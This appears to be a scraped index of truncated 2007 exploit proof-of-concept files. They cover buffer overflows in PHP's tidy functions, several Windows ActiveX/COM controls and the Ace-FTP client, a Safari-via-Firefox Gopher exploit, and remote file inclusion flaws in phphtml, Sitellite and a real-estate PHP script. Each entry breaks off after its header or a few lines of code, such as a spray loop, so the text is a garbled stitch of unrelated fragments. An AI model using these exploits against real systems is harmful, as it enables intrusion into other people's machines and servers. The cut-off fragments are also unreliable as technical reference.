?php //PHP 5.2.3 tidy_parse_string() tidy_repair_string() local //buffer overflow poc (win) //rgod //site: retrogod.altervista.org //quickly tested on xp sp2, worked both from the cli and on apache //let's have a look here: http://www.google.com/code
phphtml v 0.6.4 FOUND BY : o0xxdark0o Website: http://www.sitellite.org/ DOWNLOAD : http://sourceforge.net/projects/phphtml REMOTE FILE INCLUDE ############################################################ FILE : PATHphphtml.php #####################
*sitellite*http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz v 4.2.12 DORK : powered by Sitellite FOUND BY : o0xxdark0o o0xxdark0o[at]msn.com Website: http://www.sitellite.org/ DOWNLOAD : h
MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC Tested on full patched XP/SP2, IE7, MSO2003 html object id=ctl classid=clsid:{0002E55B-0000-0000-C000-000000000046}/object script language=javascript var b = 'AAAA'; while (b.length =
!-- 6.30 10/06/2007 Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll 4.0.4.2512) / DirectSpeechRecognition Module (Xlisten.dll 4.0.4.2512) remote buffer overflow exploit/ xp sp2 version both dlls are vulnerable, this is the poc for the firs
!-- 01/06/2007 23.19.50 Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll) / DirectSpeechRecognition Module (Xlisten.dll) remote buffer overflow exploit / 2k sp4 seh version both the dlls are located in %SystemRoot%speech folder and they ar
!-- Safari for Windows, 0day exploit in 2 hours http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ By Thor Larholm The below PoC exploit will exploit Safari by bouncing through Firefox via the Gopher protocol, passing on unfilt
pre codespan style=font: 10pt Courier New;span class=general1-symbol----------------------------------------------------------------------------------------------------------------- bTEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) S
#!/usr/bin/python ####################################################################### #Credit to n00b for finding the bug. #Ace-Ftp client buffer over flow p0c. #This is possible to exploit as we #Smash the seh handlers and there are #Plenty of r
!--========================== ================================================== Internet Explorer ver 6.0 , 7.0 Tested On Winados SP2 DeltahackingSecurityTEAM Bug discovered by Dr.Pantagon Affected Software: idaiehlp.dll (IE 4.x-6.x BHO for Internet
html head meta http-equiv=Content-Type content=text/html; charset=windows-1254 titlePHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion Exploit/title script language=JavaScript //================================================